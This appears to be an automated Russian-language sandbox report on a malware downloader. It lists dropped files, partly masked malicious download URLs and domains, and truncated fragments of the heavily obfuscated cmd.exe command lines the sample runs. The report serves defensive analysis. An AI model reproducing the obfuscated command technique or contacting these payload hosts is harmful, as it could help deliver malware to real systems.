Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c F^oR ; /^f , " tokens= +2 delims=a=bZft" ; %^G , ; ^In , ( ; ' ; ^^AssOc , , .^^cmd ' ; ; ) , ; dO , ; %^G; ; UDT^/V^v^ ; , t9G1Rn2P/^r " ; , (^SeT ^ ^ ^- =6^ToN^S^'t...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\556.exe
Удаляет следующие файлы
- %TEMP%\556.exe
Сетевая активность
Подключается к
- 'ka#####ogutma.com.tr':80
- 'eu#####nsleepcenter.fr':80
- 'sh##e.mn':80
- 'sh##e.mn':443
- 'as####-tunisie.com':80
TCP
Запросы HTTP GET
- http://www.ka#####ogutma.com.tr/T
- http://eu#####nsleepcenter.fr/Q
- http://sh##e.mn/wp-content/uploads/AD/
- http://www.as####-tunisie.com/Cs/
Другие
- 'sh##e.mn':443
UDP
- DNS ASK ka#####ogutma.com.tr
- DNS ASK eu#####nsleepcenter.fr
- DNS ASK sh##e.mn
- DNS ASK as####-tunisie.com
- DNS ASK oo###art-ekb.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c F^oR ; /^f , " tokens= +2 delims=a=bZft" ; %^G , ; ^In , ( ; ' ; ^^AssOc , , .^^cmd ' ; ; ) , ; dO , ; %^G; ; UDT^/V^v^ ; , t9G1Rn2P/^r " ; , (^SeT ^ ^ ^- =6^ToN^S^'t...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ^AssOc .^cmd
- '<SYSTEM32>\cmd.exe' ; ; UDT/Vv ; , t9G1Rn2P/r " ; , (^SeT ^ ^ ^- =6^ToN^S^'tg^i^lw}A^)$e5j^Ck.uF^psn hc@D:mr^f{^QxzRL^v-d;^(b+\^ya^,=P/^BW)&& ; , FO^r , , %^w ; IN ; ; ( 23 ; +^2 +^10 ^,^ , ...
